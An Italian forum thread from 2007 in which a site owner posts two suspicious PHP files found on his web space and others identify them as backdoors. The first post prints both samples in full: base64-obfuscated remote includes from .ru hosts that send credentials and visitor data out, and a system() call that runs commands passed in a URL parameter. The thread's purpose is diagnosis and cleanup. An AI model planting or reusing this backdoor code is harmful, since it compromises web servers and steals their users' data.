.dsy:it.
Show 150 posts per page

.dsy:it. (http://www.dsy.it/forum/)
- Tech (http://www.dsy.it/forum/forumdisplay.php?forumid=189)
-- [MER*A] file php sospetti (http://www.dsy.it/forum/showthread.php?threadid=29680)

Posted by Gighen on 25-02-2007 12:22:

[MER*A] file php sospetti

ciao..
mi sono trovato dei file di certo non miei in nel mio spazio web...

<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode(" aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZH
I9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>


-----------------------------------------

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>


secondo voi cosa fanno???

__________________
"Documentation is like sex: when it's good, it's very, very good; and when it's bad, it's still better than nothing."
Dick Brandon

Posted by hannibal on 25-02-2007 14:50:

Non mi sono messo esattamente a decifrarli per benino, comunque ad una prima occhiata mi sembra una backdoor. Cercano di mascherare i loro sporchi parametri usando la codifica base 64, e usano tutto ciò per ricevere vari dati sul tuo server. Comunque se decodifichi
aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZH
I9
ti viene fuori http://bis.iframe.ru/master.php?r_addr=

File sospetto che punta a url russo = zappa via la webroot e inizia a interrogarti su come sono entrati. Personalmente ho due idee

1) [probabilità 10%] hanno bucato ftp e ti hanno uploadato quello schifo. Dubito, avrebbero potuto fare anche cose peggiori in questo caso.
2) [probabilità 90%] avevi sul server uno script php che permette l'upload e che soffre di una vulnerabilità grossa come una casa, i furbi sono quindi riusciti ad uploadare il file che volevano loro (dubito che tu permettessi l'upload di file .php) nella cartella che volevano loro (dubito che tu permettessi l'upload di file dandogli pure permessi di esecuzione)

Sempre a naso potrei dirti che si potrebbe trattare di un attacco fatto su larga scala (stile worm), il che sarebbe sensato se tu avessi avuto sul server una applicazione php parecchio nota e parecchio buggata (phpbb?)

__________________
Computer Science: solving today's problems tomorrow.

Posted by yeah on 25-02-2007 14:56:

Nomi dei file? Sono stati collegati a pagine?

Il primo sembra inviare dati a http://bis.iframe.ru/master.php?r_addr= (decodificato da base64 dalla stringa in base64_decode(" aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZH
I9"), dati che preleva forse da qualche modulo sul tuo sito.

Inoltre questa riga

code:

 if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}

permette di eseguire un programma passato sull'URL

Anche il secondo probabilmente fa qualcosa di simile, ho dato solo una rapida lettura.

Ma sono stati collegati ad altre pagine?

[edit] Arrivato tardi :)

__________________
?

Posted by Gighen on 25-02-2007 17:46:

avevo capito capito fosse una cosa così ma non mi è ancora chiaro cosa esattamente...
ho scoperto il problema per una grandissima quantità di mail delivery failure da casella @ilmiodominio che non esistono.

Non mi pare di averperò trovato nulla che sendi emails, anche se quello che dice yeah del GET....

Per il momento ho rimosso tutti i file ed ho contattato l'assistenza clienti
[cmq niente PHPBB, solo wordpress :/]

__________________
"Documentation is like sex: when it's good, it's very, very good; and when it's bad, it's still better than nothing."
Dick Brandon

Posted by DeepBlue on 26-02-2007 08:24:

http://secunia.com/search/?search=wordpress ?

__________________
~ get Debian! ~ get FreeBSD! ~ get OpenBSD! ~

All times are GMT. The time now is 02:31.
Show all 5 posts from this thread on one page

Powered by: vBulletin Version 2.3.1
Copyright © Jelsoft Enterprises Limited 2000 - 2002.